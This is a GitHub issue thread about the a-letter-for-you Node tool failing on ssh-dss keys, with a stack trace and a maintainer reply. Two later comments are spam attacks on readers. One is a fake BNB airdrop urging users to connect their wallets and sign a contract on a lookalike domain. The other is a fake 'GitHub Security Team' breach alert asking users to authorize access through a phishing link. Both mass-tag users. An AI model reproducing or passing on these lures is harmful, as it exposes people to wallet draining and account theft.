### ISSUE TITLE
only ssh-rsa format supported

### ISSUE THREAD

**Issue by bdmorin** [watilde/a-letter-for-you#1]
```
-> % a-letter-for-you -u strozykowski -m "ur a punk" -o ben.txt

/Users/bdmorin/.nvm/v0.10.36/lib/node_modules/a-letter-for-you/node_modules/ursa/lib/ursa.js:238
        throw new TypeError('Only "ssh-rsa" format supported');
              ^
TypeError: Only "ssh-rsa" format supported
    at Object.openSshPublicKey (/Users/bdmorin/.nvm/v0.10.36/lib/node_modules/a-letter-for-you/node_modules/ursa/lib/ursa.js:238:15)
    at encryptString (/Users/bdmorin/.nvm/v0.10.36/lib/node_modules/a-letter-for-you/a-letter-for-you.js:39:18)
    at /Users/bdmorin/.nvm/v0.10.36/lib/node_modules/a-letter-for-you/a-letter-for-you.js:35:3
    at IncomingMessage.<anonymous> (/Users/bdmorin/.nvm/v0.10.36/lib/node_modules/a-letter-for-you/a-letter-for-you.js:73:7)
    at IncomingMessage.emit (events.js:117:20)
    at _stream_readable.js:944:16
    at process._tickCallback (node.js:442:13)
```

This was due to my recipient had a ssh-dss key uploaded. After picking on him, he changed it and everything was fine. If I knew node better I'd add a check for compatible key, since I don't, I'm simply reporting it as an issue. 

Very cool idea.

**Comment by watilde** [comment]
Oh thanks for reporting a error! I'm sorry for that current code actually supported only "ssh-rsa" format.
So, I'll try to fix sometimes and just put a `patch_welcome` tag to here.

**Comment by upccjesse** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @jony4, @potatogim, @MrBuggySan, @carlbarrdahl, @akoufa, @json1989, @alexming2020

**Comment by akashakki** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
mdarche, @chenzewang, @lispc, @nealfu, @keyz, @hcqiu, @wighawag, @AgustinSRG, @8adre, @canhtvee, @ETH-KT, @Vialo, @wtyi, @Kk150518, @shanezhiu, @reg2005, @secobarbital, @Mc01, @twinsant, @tedwp
